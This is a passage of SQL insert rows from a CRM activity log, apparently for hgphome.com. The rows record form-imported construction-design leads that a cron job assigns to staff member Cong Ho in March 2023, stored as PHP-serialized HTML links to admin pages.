(54, 25, 'not_activity_new_task_created', 'a:1:{i:0;s:135:\"<a href=\"https://hgphome.com/admin/tasks/view/139\" onclick=\"init_task_modal(139);return false;\">Tư vấn khách - 27Feb - @Sương</a>\";}', '2023-02-27 11:50:04', 1, 'Ho Gia Phat', 0),
(75, 33, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-02 13:47:46', 0, '[CRON]', 0),
(76, 33, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-02 13:47:46', 0, '[CRON]', 0),
(77, 34, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-02 14:28:00', 0, '[CRON]', 0),
(78, 34, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-02 14:28:00', 0, '[CRON]', 0),
(79, 35, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-02 14:31:36', 0, '[CRON]', 0),
(80, 35, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-02 14:31:36', 0, '[CRON]', 0),
(81, 36, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-02 14:32:18', 0, '[CRON]', 0),
(82, 36, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-02 14:32:18', 0, '[CRON]', 0),
(83, 37, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-02 14:32:55', 0, '[CRON]', 0),
(84, 37, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-02 14:32:55', 0, '[CRON]', 0),
(85, 38, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-02 14:34:00', 0, '[CRON]', 0),
(86, 38, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-02 14:34:00', 0, '[CRON]', 0),
(87, 39, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-02 14:34:46', 0, '[CRON]', 0),
(88, 39, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-02 14:34:46', 0, '[CRON]', 0),
(89, 40, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-02 14:36:16', 0, '[CRON]', 0),
(90, 40, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-02 14:36:16', 0, '[CRON]', 0),
(91, 41, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-02 14:36:51', 0, '[CRON]', 0),
(92, 41, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-02 14:36:51', 0, '[CRON]', 0),
(93, 42, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-02 14:37:28', 0, '[CRON]', 0),
(94, 42, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-02 14:37:28', 0, '[CRON]', 0),
(95, 43, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-02 14:38:09', 0, '[CRON]', 0),
(96, 43, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-02 14:38:09', 0, '[CRON]', 0),
(97, 44, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-02 14:38:37', 0, '[CRON]', 0),
(98, 44, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-02 14:38:37', 0, '[CRON]', 0),
(99, 45, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-02 20:20:46', 0, '[CRON]', 0),
(100, 45, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-02 20:20:46', 0, '[CRON]', 0),
(103, 47, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-04 15:57:54', 0, '[CRON]', 0),
(104, 47, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-04 15:57:54', 0, '[CRON]', 0),
(105, 48, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-04 16:08:10', 0, '[CRON]', 0),
(106, 48, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-04 16:08:11', 0, '[CRON]', 0),
(107, 49, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-04 16:09:07', 0, '[CRON]', 0),
(108, 49, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-04 16:09:08', 0, '[CRON]', 0),
(109, 50, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-04 16:10:20', 0, '[CRON]', 0),
(110, 50, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-04 16:10:20', 0, '[CRON]', 0),
(111, 51, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-04 16:13:25', 0, '[CRON]', 0),
(112, 51, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-04 16:13:25', 0, '[CRON]', 0),
(115, 53, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-04 16:21:24', 0, '[CRON]', 0),
(116, 53, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-04 16:21:25', 0, '[CRON]', 0),
(117, 54, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-04 16:38:53', 0, '[CRON]', 0),
(118, 54, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-04 16:38:53', 0, '[CRON]', 0),
(119, 55, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-04 16:49:40', 0, '[CRON]', 0),
(120, 55, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-04 16:49:40', 0, '[CRON]', 0),
(121, 56, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-04 16:51:57', 0, '[CRON]', 0),
(122, 56, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-04 16:51:57', 0, '[CRON]', 0),
(123, 57, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-06 13:55:09', 0, '[CRON]', 0),
(124, 57, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-06 13:55:09', 0, '[CRON]', 0),
(125, 58, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-06 13:55:50', 0, '[CRON]', 0),
(126, 58, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-06 13:55:50', 0, '[CRON]', 0),
(127, 59, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-06 13:58:22', 0, '[CRON]', 0),
(128, 59, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-06 13:58:22', 0, '[CRON]', 0),
(129, 60, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-06 13:59:05', 0, '[CRON]', 0),
(130, 60, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-06 13:59:05', 0, '[CRON]', 0),
(131, 61, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-06 13:59:52', 0, '[CRON]', 0),
(132, 61, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-06 13:59:52', 0, '[CRON]', 0),
(133, 62, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-06 14:01:30', 0, '[CRON]', 0),
(134, 62, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-06 14:01:30', 0, '[CRON]', 0),
(137, 64, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-07 13:54:26', 0, '[CRON]', 0),
(138, 64, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-07 13:54:26', 0, '[CRON]', 0),
(139, 65, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-07 13:55:09', 0, '[CRON]', 0),
(140, 65, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-07 13:55:09', 0, '[CRON]', 0),
(141, 66, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-07 13:56:16', 0, '[CRON]', 0),
(142, 66, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-07 13:56:16', 0, '[CRON]', 0),
(143, 67, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-07 13:57:35', 0, '[CRON]', 0),
(144, 67, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-07 13:57:35', 0, '[CRON]', 0),
(145, 68, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-07 13:58:33', 0, '[CRON]', 0),
(146, 68, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-07 13:58:33', 0, '[CRON]', 0),
(147, 69, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-07 13:59:24', 0, '[CRON]', 0),
(148, 69, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-07 13:59:24', 0, '[CRON]', 0),
(149, 70, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-07 14:00:09', 0, '[CRON]', 0),
(150, 70, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-07 14:00:09', 0, '[CRON]', 0),
(151, 71, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-07 14:00:46', 0, '[CRON]', 0),
(152, 71, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-07 14:00:46', 0, '[CRON]', 0),
(153, 72, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-07 14:01:32', 0, '[CRON]', 0),
(154, 72, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-07 14:01:32', 0, '[CRON]', 0),
(155, 73, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-07 14:04:12', 0, '[CRON]', 0),
(156, 73, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-07 14:04:12', 0, '[CRON]', 0),
(160, 75, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-11 11:48:33', 0, '[CRON]', 0),
(161, 75, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-11 11:48:33', 0, '[CRON]', 0),
(162, 76, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-14 10:10:07', 0, '[CRON]', 0),
(163, 76, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-14 10:10:07', 0, '[CRON]', 0),
(164, 77, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-14 10:12:11', 0, '[CRON]', 0),
(165, 77, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-14 10:12:11', 0, '[CRON]', 0),
(166, 78, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-14 10:13:02', 0, '[CRON]', 0),
(167, 78, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-14 10:13:02', 0, '[CRON]', 0),
(168, 79, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-14 10:13:47', 0, '[CRON]', 0),
(169, 79, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-14 10:13:47', 0, '[CRON]', 0),
(170, 80, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-14 10:14:29', 0, '[CRON]', 0),
(171, 80, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-14 10:14:29', 0, '[CRON]', 0),
(172, 81, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-14 10:15:04', 0, '[CRON]', 0),
(173, 81, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-14 10:15:04', 0, '[CRON]', 0),
(174, 82, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-14 10:15:38', 0, '[CRON]', 0),
(175, 82, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-14 10:15:38', 0, '[CRON]', 0),
(176, 83, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-14 10:16:17', 0, '[CRON]', 0),
(177, 83, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-14 10:16:17', 0, '[CRON]', 0),
(178, 84, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-14 10:16:53', 0, '[CRON]', 0),
(179, 84, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-14 10:16:53', 0, '[CRON]', 0),
(180, 85, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-14 10:17:29', 0, '[CRON]', 0),
(181, 85, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-14 10:17:29', 0, '[CRON]', 0),
(182, 86, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-14 14:48:58', 0, '[CRON]', 0),
(183, 86, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-14 14:48:58', 0, '[CRON]', 0),
(184, 87, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-14 14:51:31', 0, '[CRON]', 0),
(185, 87, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-14 14:51:31', 0, '[CRON]', 0),
(186, 88, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-14 14:55:56', 0, '[CRON]', 0),
(187, 88, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-14 14:55:57', 0, '[CRON]', 0),
(188, 89, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-14 14:57:46', 0, '[CRON]', 0),
(189, 89, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-14 14:57:46', 0, '[CRON]', 0),
(190, 90, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-14 15:00:46', 0, '[CRON]', 0),
(191, 90, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-14 15:00:46', 0, '[CRON]', 0),
(192, 91, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-14 15:04:00', 0, '[CRON]', 0),
(193, 91, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-14 15:04:00', 0, '[CRON]', 0),
(194, 92, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-14 15:08:06', 0, '[CRON]', 0),
(195, 92, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-14 15:08:06', 0, '[CRON]', 0),
(196, 93, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-14 15:13:47', 0, '[CRON]', 0),
(197, 93, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-14 15:13:47', 0, '[CRON]', 0),
(198, 94, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-14 15:16:28', 0, '[CRON]', 0),
(199, 94, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-14 15:16:28', 0, '[CRON]', 0),
(202, 96, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-15 10:36:00', 0, '[CRON]', 0),
(203, 96, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-15 10:36:00', 0, '[CRON]', 0),
(204, 97, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-15 10:37:02', 0, '[CRON]', 0),
(205, 97, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-15 10:37:02', 0, '[CRON]', 0),
(206, 98, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-15 10:37:37', 0, '[CRON]', 0),
(207, 98, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-15 10:37:37', 0, '[CRON]', 0),
(208, 99, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-15 10:38:13', 0, '[CRON]', 0),
(209, 99, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-15 10:38:13', 0, '[CRON]', 0),
(210, 100, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-15 11:06:47', 0, '[CRON]', 0),
(211, 100, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-15 11:06:47', 0, '[CRON]', 0),
(212, 101, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-15 11:07:46', 0, '[CRON]', 0),
(213, 101, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-15 11:07:46', 0, '[CRON]', 0),
(214, 102, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-15 11:08:32', 0, '[CRON]', 0),
(215, 102, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-15 11:08:32', 0, '[CRON]', 0),
(216, 103, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-15 11:09:19', 0, '[CRON]', 0),
(217, 103, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-15 11:09:19', 0, '[CRON]', 0),
(218, 104, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-15 11:09:49', 0, '[CRON]', 0),
(219, 104, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-15 11:09:49', 0, '[CRON]', 0),
(220, 105, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-15 14:42:08', 0, '[CRON]', 0),
(221, 105, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-15 14:42:08', 0, '[CRON]', 0),
(222, 106, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-15 14:48:22', 0, '[CRON]', 0),
(223, 106, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-15 14:48:22', 0, '[CRON]', 0),
(224, 107, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-15 14:49:10', 0, '[CRON]', 0),
(225, 107, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-15 14:49:10', 0, '[CRON]', 0),
(226, 108, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-15 14:49:56', 0, '[CRON]', 0),
(227, 108, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-15 14:49:56', 0, '[CRON]', 0),
(228, 109, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-15 14:50:30', 0, '[CRON]', 0),
(229, 109, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-15 14:50:30', 0, '[CRON]', 0),
(230, 110, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-15 14:51:10', 0, '[CRON]', 0),
(231, 110, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-15 14:51:10', 0, '[CRON]', 0),
(232, 111, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-15 14:51:51', 0, '[CRON]', 0),
(233, 111, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-15 14:51:51', 0, '[CRON]', 0),
(234, 112, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-15 14:56:22', 0, '[CRON]', 0),
